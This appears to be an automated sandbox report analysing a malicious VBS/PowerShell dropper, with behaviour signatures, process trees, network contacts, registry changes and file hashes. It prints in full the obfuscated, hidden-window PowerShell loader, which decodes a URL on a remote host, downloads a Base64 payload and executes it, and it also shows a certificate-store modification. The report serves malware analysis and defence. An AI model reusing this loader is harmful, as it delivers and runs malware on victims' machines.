Analysis Overview
SHA256
b5fc757f3a9354b1220ad605164cdc1aa2898020a845201b38a0badc14fbfe13
Threat Level: Likely malicious
The file 10062024_1322_09062024_033MSOG241591GHD.out.gz was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-10 13:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-10 13:22
Reported
2024-06-10 13:25
Platform
win7-20240221-en
Max time kernel
133s
Max time network
134s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\033MSOG241591GHD.out.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden "$Vurderingsmndene = 1;Function Corbin($overcools){$Tristimulus=$overcools.Length-$Vurderingsmndene;$Bulgy='Substring';For( $Oliekilde17=4;$Oliekilde17 -lt $Tristimulus;$Oliekilde17+=5){$Selfsustainingly+=$overcools.$Bulgy.Invoke( $Oliekilde17, $Vurderingsmndene);}$Selfsustainingly;}function Digitaliser($Fractioning){ & ($Hverne) ($Fractioning);}$Distributrnet=Corbin 'SnapMUnino ParzForeiD,mblmicrlCha,a,jel/Pese5Nucl. Ri,0M.sa Afri(Bei.W BraiUnprnBjniddykkoPenswOve.sprov AfleNnrvrT ove Hedo1 Tri0 ,rk. Fav0bibl; xtr MantWAulei LocnCrat6Uhol4 Lun;Udgi Chufx Rav6Dirk4M ll;Phyl TulirL,erv,kan:Bar,1Reko2 ,av1Stnk.Radi0Slam)Mutt Pan,GTaoie B.wcC,emkStilo Te./Cinc2Bloo0e gl1Dila0mice0Apri1Gods0Ly,r1Bent IndFI.ogiHensrforbeStavfDideoF.agxdism/ G.y1U.nn2 ill1Bort. amb0Stri ';$Admen=Corbin ' Va UKerasFreseGouvrrasp-Gen.Abootg DeleJulenNurst,upe ';$Beerily=Corbin 'EvighPurstovertI.tepLovb:Mode/Beed/C,ese SteqNobeu fleiUnwhpP.sse KonsEa lgInten katSwit.MusisBreva ,pr.Munkc Ty.oltn mRest/ HypBUn rrN taa,ustnSalgdSo.sbposto HlsmGen,bB gieNe fsR gi.,isahpreahFunnk cym ';$Graduerende156=Corbin 'Pseu> Ava ';$Hverne=Corbin 'Sh.cimisseTensx hjt ';$Retrospektions='Gslings';$Adverbialize = Corbin 'BuseeresocselvhWardoOkku Fi,a%Org aBargpT.bup Deldops.a,nmat FinaPrek% Sl.\MiniS Ta t,roniSerolFoollDetaestrblBog.eStrig bi,sPost.Skriu,nkyl D,bvBeta Orga&Ndpl&Gips blinehilbcCe,lh AfsoFrav unretHod ';Digitaliser (Corbin 'D,ge$Melog ortl DanoKon,bL.mbapolil Com: ScaTNitraHul nJ.rddMy.mrDo no GendSacrsInefbWid.e Remtdicon .xidOscierenolDirlsUsp.eSubirE.ols Sma=Emb.(R.vfchypem Aktdfl.e Mell/FipscUnfo sids$ ,ogAAfsndJutlv,esmeTotarKancbIngei.reaa Cy l.aryiSlatz Musebr.s)Coun ');Digitaliser (Corbin 'Brkj$OutrgNe rlHoveoPetrbFosfaSpillCont: DysP H.piSkiln UdrlPaapiDrejgSha,=Dent$Sim.BBouneClioeArnor AnhiMicrlCereyUd.v.H rns,ydrpSelvlBrndisvi.tRese(Lini$Nav GCathrUnimaCaped.tilu .eteFluerSalae .ycnTer,dWiree Fre1Came5 ,ke6Buc.)Matt ');$Beerily=$Pinlig[0];$ustadighedens= (Corbin 'Fash$ MacgGrnslF.kuo Monb ShiaAridlHalf: HilG aute aannMarmn lvee C.nm,avotSk.lrCrepkPr,skWhale KitnF emdJin eUsynsReno= UncN.alae Spewfi.i-DiswOBearbPimpjTaktesplacB votS,ov CandSF gsyPlejs,ilotSvabeSaddm Ton.TornN DameServt H.p. UncWsu,ae Renb olyCOdonlaveriHaireUninn,lomt');$ustadighedens+=$Tandrodsbetndelsers[1];Digitaliser ($ustadighedens);Digitaliser (Corbin 'Isoc$ P aGMaileJerrnHeren egaePuz.mOrtot Knor.uickmystk AlvePol n St dLgehe,abrsPell.Se tHPorgeBrnda anddForee Bder Un.sLap.[He.a$waffA,ysndCacom Pa.e GlonRo o] B,y= Tyd$S,arD,orsih tpsKa.atD,parOm.oi Semb Opsucocrt Untr refnGalee HootVind ');$Tyndvgget=Corbin 'gavs$VectG Sp,e BrsnTrusnLazyedesimStyntU,plr Hagkforck,bseeRe,unHousdAn.ie OnosKo g.IncoDt beoGlauwSukkn fo l KiwotoxiaFiffdTropFComtiHypelB.sie Cla(xe.o$ NriBUne,eSupeeHelbrCisaiHemolAneuy A g,Rhac$Trang repr ForaR innGudeuOverlDrifaTranttechiK.sto Co,nSekseAen.rHystnXra eUnde) non ';$granulationerne=$Tandrodsbetndelsers[0];Digitaliser (Corbin 'skit$kologGldelUndeoEgesbMot.aVestlSemi: MinERes qLoftu begiPrajvSa.moGs.ec livaGrettMa.iiI.puoRac,nrimm=Filt(o.erT,pheeSplksf tit Exc- SupPR oxaStimt,ocohse.i Syvt$in egHolir HolaLyr ndk,iu BedludskaUlpftDeeriArthoI,gan PhyeRe,rr GranPh.teGree)Prep ');while (!$Equivocation) {Digitaliser (Corbin 'Drud$ .ycgAkuplFlago SpobkrlhaReprl Non: P oRFrytaSwahnBumbssp.neSqualMisllRene=Hil,$ ChotS ggr oru,ynseSten ') ;Digitaliser $Tyndvgget;Digitaliser (Corbin ' MotSSynctDrila,enirIndstue f-Nec.S,jrglBuc e,uhae IndpNonm takk4St.r ');Digitaliser (Corbin ' Pa,$Unpag Opsl Si.oTagrbNotaa SemlAmer:VrdiERektqAnt,u.eetiNedsvVandoModec ElvaV,rbtPotoiLit.oFacan,erb=Lydl( FilT Ty,eEntasBri,tmon -IdeaPImpaaDelptUni.hType Bre$ BelgGladrVol,aTokrnKappuForblFontaExpitC,aniVa,ioAnalnPrineMadrrTentnCataeHurl)Haye ') ;Digitaliser (Corbin ' ko,$ToetgSkovlBekro BrnbcaptaNol l Pro: GosG Af.aEle,rrin,dnazeb.issrUdl a ,rdcstereUndl= Mem$ rang GynlSneroUnreb BegaLaudlSnek: StiS.urraOprymForhm.efaeUtron issbVampy orgFuntgLucieToaddSh,ien dp+Redn+Clas%Para$bortP E siAumanPhosl PhoiEx eg.yns.Justc PhooSilhu O,knUd.itCrom ') ;$Beerily=$Pinlig[$Gardbrace];}$Guiding=313361;$Hygsom=28928;Digitaliser (Corbin ' nt$Pharg Wrol ViloAfpubObjeaSoftlRost:BeleLBurdaH.venadvod NyhbOp arRke,uSubsgSy,osM tea Nerr QuiePishaPerdlRec eMisar MatsKr.e R st= Sch AutoGM.lte Agit Tig-B,neCHjemo modnK.autFarleSpiknUnbitProd No m$ iorg AfprScypaLingnAcinu LamlSlanaSalmtInoxiO eroaandnRv reSvirrDes n MbleFree ');Digitaliser (Corbin 'Ven,$ AdmgParalImpao Bryb chra,ffil Mil:DiabrMathe G udSprosTyndtBlocaBarmrConct Br,sQuad Filc= Poo udb[SjufSSubayPenssWarlt .nreVannmHybr.,yksCR,seoAfhnnHelivChuceNoncrI,dmt hje]Rese:Impa:Aft FKal,rY,kao .etm Sp.BAnywa.ults.pile Azt6Copp4Pre SQuittR.mmrpedoiCamonEurygMira(Unde$cataL Ni aA,dinHaardProgbCozyr,urtuOua gvangs B ga torrGia,eD,skaPseuludbue,igmr PhasStat)Kals ');Digitaliser (Corbin 'ti.o$BjrngRel l C uoTilsbKanaa.alelSola:RevaDPyraeSharp R,ae Soondibbd Proa ypon .vrtAbdisSkat Til=T.ve Subt[ImmoSFlomyMi isCyphtHesteDatemHyld. DisT UrieY.guxLap,tFals. BukERevonUti.cUdsmoTrandBnk i AftnOmdegPe t]Yder: Hur:GrunA TekSMob.CGolfIun.eILini.FngsG.lute hentS,seSSkogtSjlerGonoi Nonn Sadgg.yc( mes$ PaarOldbeCorodIsotsJon.tB,ndaLigerCompt HarsVild)Abil ');Digitaliser (Corbin 'Udfa$ lgg.nwolSnekoAngobDeseaFiskl Tot: VowAEntogPromgMo.iePeddlSe,ia Indt ,nuiHor.o s.bnWo,d= Aqu$ R cDZongeDeclpBataeContnZonodAbsia.eginDolltTriqsSkam.AoifsWithuHe.abparos mpot,olkrApotisparnRygtga.an( U,t$HjemG uttuD,foiPrimdBlokiSu.gn s.lgCiv.,Sk.v$ SkrH UdsyDi ggShelsToo oBourm Nep)Vrne ');Digitaliser $Aggelation;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stillelegs.ulv && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vurderingsmndene = 1;Function Corbin($overcools){$Tristimulus=$overcools.Length-$Vurderingsmndene;$Bulgy='Substring';For( $Oliekilde17=4;$Oliekilde17 -lt $Tristimulus;$Oliekilde17+=5){$Selfsustainingly+=$overcools.$Bulgy.Invoke( $Oliekilde17, $Vurderingsmndene);}$Selfsustainingly;}function Digitaliser($Fractioning){ & ($Hverne) ($Fractioning);}$Distributrnet=Corbin 'SnapMUnino ParzForeiD,mblmicrlCha,a,jel/Pese5Nucl. Ri,0M.sa Afri(Bei.W BraiUnprnBjniddykkoPenswOve.sprov AfleNnrvrT ove Hedo1 Tri0 ,rk. Fav0bibl; xtr MantWAulei LocnCrat6Uhol4 Lun;Udgi Chufx Rav6Dirk4M ll;Phyl TulirL,erv,kan:Bar,1Reko2 ,av1Stnk.Radi0Slam)Mutt Pan,GTaoie B.wcC,emkStilo Te./Cinc2Bloo0e gl1Dila0mice0Apri1Gods0Ly,r1Bent IndFI.ogiHensrforbeStavfDideoF.agxdism/ G.y1U.nn2 ill1Bort. amb0Stri ';$Admen=Corbin ' Va UKerasFreseGouvrrasp-Gen.Abootg DeleJulenNurst,upe ';$Beerily=Corbin 'EvighPurstovertI.tepLovb:Mode/Beed/C,ese SteqNobeu fleiUnwhpP.sse KonsEa lgInten katSwit.MusisBreva ,pr.Munkc Ty.oltn mRest/ HypBUn rrN taa,ustnSalgdSo.sbposto HlsmGen,bB gieNe fsR gi.,isahpreahFunnk cym ';$Graduerende156=Corbin 'Pseu> Ava ';$Hverne=Corbin 'Sh.cimisseTensx hjt ';$Retrospektions='Gslings';$Adverbialize = Corbin 'BuseeresocselvhWardoOkku Fi,a%Org aBargpT.bup Deldops.a,nmat FinaPrek% Sl.\MiniS Ta t,roniSerolFoollDetaestrblBog.eStrig bi,sPost.Skriu,nkyl D,bvBeta Orga&Ndpl&Gips blinehilbcCe,lh AfsoFrav unretHod ';Digitaliser (Corbin 'D,ge$Melog ortl DanoKon,bL.mbapolil Com: ScaTNitraHul nJ.rddMy.mrDo no GendSacrsInefbWid.e Remtdicon .xidOscierenolDirlsUsp.eSubirE.ols Sma=Emb.(R.vfchypem Aktdfl.e Mell/FipscUnfo sids$ ,ogAAfsndJutlv,esmeTotarKancbIngei.reaa Cy l.aryiSlatz Musebr.s)Coun ');Digitaliser (Corbin 'Brkj$OutrgNe rlHoveoPetrbFosfaSpillCont: DysP H.piSkiln UdrlPaapiDrejgSha,=Dent$Sim.BBouneClioeArnor AnhiMicrlCereyUd.v.H rns,ydrpSelvlBrndisvi.tRese(Lini$Nav GCathrUnimaCaped.tilu .eteFluerSalae .ycnTer,dWiree Fre1Came5 ,ke6Buc.)Matt ');$Beerily=$Pinlig[0];$ustadighedens= (Corbin 'Fash$ MacgGrnslF.kuo Monb ShiaAridlHalf: HilG aute aannMarmn lvee C.nm,avotSk.lrCrepkPr,skWhale KitnF emdJin eUsynsReno= UncN.alae Spewfi.i-DiswOBearbPimpjTaktesplacB votS,ov CandSF gsyPlejs,ilotSvabeSaddm Ton.TornN DameServt H.p. UncWsu,ae Renb olyCOdonlaveriHaireUninn,lomt');$ustadighedens+=$Tandrodsbetndelsers[1];Digitaliser ($ustadighedens);Digitaliser (Corbin 'Isoc$ P aGMaileJerrnHeren egaePuz.mOrtot Knor.uickmystk AlvePol n St dLgehe,abrsPell.Se tHPorgeBrnda anddForee Bder Un.sLap.[He.a$waffA,ysndCacom Pa.e GlonRo o] B,y= Tyd$S,arD,orsih tpsKa.atD,parOm.oi Semb Opsucocrt Untr refnGalee HootVind ');$Tyndvgget=Corbin 'gavs$VectG Sp,e BrsnTrusnLazyedesimStyntU,plr Hagkforck,bseeRe,unHousdAn.ie OnosKo g.IncoDt beoGlauwSukkn fo l KiwotoxiaFiffdTropFComtiHypelB.sie Cla(xe.o$ NriBUne,eSupeeHelbrCisaiHemolAneuy A g,Rhac$Trang repr ForaR innGudeuOverlDrifaTranttechiK.sto Co,nSekseAen.rHystnXra eUnde) non ';$granulationerne=$Tandrodsbetndelsers[0];Digitaliser (Corbin 'skit$kologGldelUndeoEgesbMot.aVestlSemi: MinERes qLoftu begiPrajvSa.moGs.ec livaGrettMa.iiI.puoRac,nrimm=Filt(o.erT,pheeSplksf tit Exc- SupPR oxaStimt,ocohse.i Syvt$in egHolir HolaLyr ndk,iu BedludskaUlpftDeeriArthoI,gan PhyeRe,rr GranPh.teGree)Prep ');while (!$Equivocation) {Digitaliser (Corbin 'Drud$ .ycgAkuplFlago SpobkrlhaReprl Non: P oRFrytaSwahnBumbssp.neSqualMisllRene=Hil,$ ChotS ggr oru,ynseSten ') ;Digitaliser $Tyndvgget;Digitaliser (Corbin ' MotSSynctDrila,enirIndstue f-Nec.S,jrglBuc e,uhae IndpNonm takk4St.r ');Digitaliser (Corbin ' Pa,$Unpag Opsl Si.oTagrbNotaa SemlAmer:VrdiERektqAnt,u.eetiNedsvVandoModec ElvaV,rbtPotoiLit.oFacan,erb=Lydl( FilT Ty,eEntasBri,tmon -IdeaPImpaaDelptUni.hType Bre$ BelgGladrVol,aTokrnKappuForblFontaExpitC,aniVa,ioAnalnPrineMadrrTentnCataeHurl)Haye ') ;Digitaliser (Corbin ' ko,$ToetgSkovlBekro BrnbcaptaNol l Pro: GosG Af.aEle,rrin,dnazeb.issrUdl a ,rdcstereUndl= Mem$ rang GynlSneroUnreb BegaLaudlSnek: StiS.urraOprymForhm.efaeUtron issbVampy orgFuntgLucieToaddSh,ien dp+Redn+Clas%Para$bortP E siAumanPhosl PhoiEx eg.yns.Justc PhooSilhu O,knUd.itCrom ') ;$Beerily=$Pinlig[$Gardbrace];}$Guiding=313361;$Hygsom=28928;Digitaliser (Corbin ' nt$Pharg Wrol ViloAfpubObjeaSoftlRost:BeleLBurdaH.venadvod NyhbOp arRke,uSubsgSy,osM tea Nerr QuiePishaPerdlRec eMisar MatsKr.e R st= Sch AutoGM.lte Agit Tig-B,neCHjemo modnK.autFarleSpiknUnbitProd No m$ iorg AfprScypaLingnAcinu LamlSlanaSalmtInoxiO eroaandnRv reSvirrDes n MbleFree ');Digitaliser (Corbin 'Ven,$ AdmgParalImpao Bryb chra,ffil Mil:DiabrMathe G udSprosTyndtBlocaBarmrConct Br,sQuad Filc= Poo udb[SjufSSubayPenssWarlt .nreVannmHybr.,yksCR,seoAfhnnHelivChuceNoncrI,dmt hje]Rese:Impa:Aft FKal,rY,kao .etm Sp.BAnywa.ults.pile Azt6Copp4Pre SQuittR.mmrpedoiCamonEurygMira(Unde$cataL Ni aA,dinHaardProgbCozyr,urtuOua gvangs B ga torrGia,eD,skaPseuludbue,igmr PhasStat)Kals ');Digitaliser (Corbin 'ti.o$BjrngRel l C uoTilsbKanaa.alelSola:RevaDPyraeSharp R,ae Soondibbd Proa ypon .vrtAbdisSkat Til=T.ve Subt[ImmoSFlomyMi isCyphtHesteDatemHyld. DisT UrieY.guxLap,tFals. BukERevonUti.cUdsmoTrandBnk i AftnOmdegPe t]Yder: Hur:GrunA TekSMob.CGolfIun.eILini.FngsG.lute hentS,seSSkogtSjlerGonoi Nonn Sadgg.yc( mes$ PaarOldbeCorodIsotsJon.tB,ndaLigerCompt HarsVild)Abil ');Digitaliser (Corbin 'Udfa$ lgg.nwolSnekoAngobDeseaFiskl Tot: VowAEntogPromgMo.iePeddlSe,ia Indt ,nuiHor.o s.bnWo,d= Aqu$ R cDZongeDeclpBataeContnZonodAbsia.eginDolltTriqsSkam.AoifsWithuHe.abparos mpot,olkrApotisparnRygtga.an( U,t$HjemG uttuD,foiPrimdBlokiSu.gn s.lgCiv.,Sk.v$ SkrH UdsyDi ggShelsToo oBourm Nep)Vrne ');Digitaliser $Aggelation;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stillelegs.ulv && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | equipesgnt.sa.com | udp |
| DE | 84.247.168.16:80 | equipesgnt.sa.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab173A.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar174D.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
memory/1624-49-0x000007FEF5DCE000-0x000007FEF5DCF000-memory.dmp
memory/1624-50-0x000000001B520000-0x000000001B802000-memory.dmp
memory/1624-51-0x0000000001F50000-0x0000000001F58000-memory.dmp
memory/1624-52-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/1624-53-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/1624-54-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/1624-55-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UWS44I1WDHBX8K8NAUDI.temp
| MD5 | 7ea4a9172269349a3a2250b1902546e6 |
| SHA1 | 922c2c68e79cebe9f439e0a3bd009b7246586d75 |
| SHA256 | 2fa2c0169df37cadf671efb842e5c13c860930cf001078ddd26eebb7dcf9275a |
| SHA512 | d33c91d33a953fc26459532e98f12b76d65e4527046ec9d302dc4fbddd327cbf60e39803a2bf4b3d3c2126a46f907416bd23c60a3ee1d37bcaa0103fa2cb52f3 |
C:\Users\Admin\AppData\Roaming\Stillelegs.ulv
| MD5 | 55637e3c8b1599767fc3678c12d4f158 |
| SHA1 | 01757599794dcd1f72dbb7cdde2f1d77dc643d6c |
| SHA256 | 1c159d03f6942cb5d49ba980c88c10a4f88eeca751211f644ffa6f376edbbe85 |
| SHA512 | 7f8d9149ab9ceb23913372a44205cb1615f6f3a9457940a6e6cd7e45e8c1b0e7fff5ec3cc6da2ffb07d0ac8f80d3f77a65693d6079b5ab8843f4f038e400c633 |
memory/2792-61-0x0000000006600000-0x000000000BD89000-memory.dmp
memory/1624-62-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/1624-63-0x000007FEF5DCE000-0x000007FEF5DCF000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-10 13:22
Reported
2024-06-10 13:25
Platform
win10v2004-20240508-en
Max time kernel
146s
Max time network
144s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
